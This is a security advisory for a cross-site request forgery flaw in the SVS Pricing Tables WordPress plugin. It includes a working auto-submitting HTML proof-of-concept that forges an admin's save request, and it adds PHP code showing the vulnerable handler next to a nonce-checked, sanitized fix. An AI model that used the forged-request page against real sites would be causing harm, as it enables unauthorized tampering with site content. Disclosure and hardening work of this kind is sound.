Description
The SVS Pricing Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.4. This is due to missing or incorrect nonce validation on the savePricingTable() function: the save handler acts on any POST that arrives with the administrator's session cookie, and the browser attaches that cookie to cross-site form submissions automatically. This makes it possible for unauthenticated attackers to create and edit pricing tables via a forged request, provided they can trick a site administrator into performing an action such as clicking on a link.
Severity
4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Affected Version
<= 1.0.4
PoC:
<html>
<!-- eneriiiii PoC <3 -->
<body>
  <!-- Forged POST to the plugin's save handler; no nonce field is sent because none is checked server-side -->
  <form action="http://[ASSETS]/wp-admin/admin.php?page=svs_pricing_tables&Action=pricingTableSave" method="POST">
    <input type="hidden" name="name" value="eneriiii - XSS" />
    <input type="hidden" name="template" value="t04" />
    <input type="hidden" name="htmlAdmin" value="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" />
    <input type="hidden" name="html" value="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" />
    <input type="submit" value="Submit request" />
  </form>
  <script>
    // Replace the visible URL so the PoC page looks like the site root, then auto-submit
    // the form; the victim's logged-in admin cookie is attached by the browser.
    history.pushState('', '', '/');
    document.forms[0].submit();
  </script>
</body>
</html>
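The following is an added example, not code from the SVS Pricing Tables plugin or from the PoC author. It shows the request-handling pattern the advisory describes (a save handler that trusts any POST carrying the admin's cookie) beside a hardened version that rejects the forged request above. The function names, the option key and the capability used are assumptions for illustration; the WordPress API calls (current_user_can, check_admin_referer, wp_nonce_field, sanitize_text_field, sanitize_key, wp_kses_post, wp_unslash, update_option) are real core functions.

```php
<?php
// Added example (not the plugin's own code). Names such as svs_pt_save_vulnerable,
// svs_pt_save_hardened, svs_pt_render_form and the option key 'svs_pt_table' are hypothetical.

// Vulnerable pattern: reached from admin.php?page=svs_pricing_tables&Action=pricingTableSave.
// Nothing ties the request to an action the admin actually initiated, so a cross-site form
// (as in the PoC above) that posts name/template/htmlAdmin/html is accepted and stored.
function svs_pt_save_vulnerable() {
    $table = array(
        'name'      => $_POST['name'],
        'template'  => $_POST['template'],
        'htmlAdmin' => $_POST['htmlAdmin'],
        'html'      => $_POST['html'],
    );
    update_option( 'svs_pt_table', $table ); // hypothetical storage location
}

// Hardened pattern: require a capable user AND a nonce bound to this action, then sanitize.
function svs_pt_save_hardened() {
    // Authorization: the handler must not be usable by low-privilege accounts either.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // CSRF: check_admin_referer() runs wp_verify_nonce() on $_REQUEST['_wpnonce'] and
    // dies with "The link you followed has expired" if it is missing or invalid.
    // A cross-origin page cannot read the victim's nonce, so the PoC form fails here.
    check_admin_referer( 'svs_pt_save_table' );

    $table = array(
        'name'      => sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) ),
        'template'  => sanitize_key( $_POST['template'] ?? '' ),
        'htmlAdmin' => wp_kses_post( wp_unslash( $_POST['htmlAdmin'] ?? '' ) ),
        'html'      => wp_kses_post( wp_unslash( $_POST['html'] ?? '' ) ),
    );
    update_option( 'svs_pt_table', $table );
}

// The legitimate admin form must emit the matching nonce; it is the only page that can.
function svs_pt_render_form() {
    $action = admin_url( 'admin.php?page=svs_pricing_tables&Action=pricingTableSave' );
    ?>
    <form method="post" action="<?php echo esc_url( $action ); ?>">
        <?php wp_nonce_field( 'svs_pt_save_table' ); // adds _wpnonce and _wp_http_referer ?>
        <input type="text" name="name" />
        <input type="text" name="template" />
        <textarea name="html"></textarea>
        <input type="submit" value="Save" />
    </form>
    <?php
}
```

The nonce check alone is what closes the CSRF issue reported here; the capability check is the separate authorization control that should accompany any admin-side write. The wp_kses_post() calls are defence in depth for the case where the stored markup is later rendered on the front end; if the plugin intentionally accepts raw HTML from administrators, gate that on the unfiltered_html capability rather than dropping the filter for everyone.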
Reference
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/svs-pricing-tables/svs-pricing-tables-104-cross-site-request-forgery-to-pricing-table-editcreation
- https://plugins.trac.wordpress.org/browser/svs-pricing-tables/trunk/app/model/svs_pt_model_main.php#L61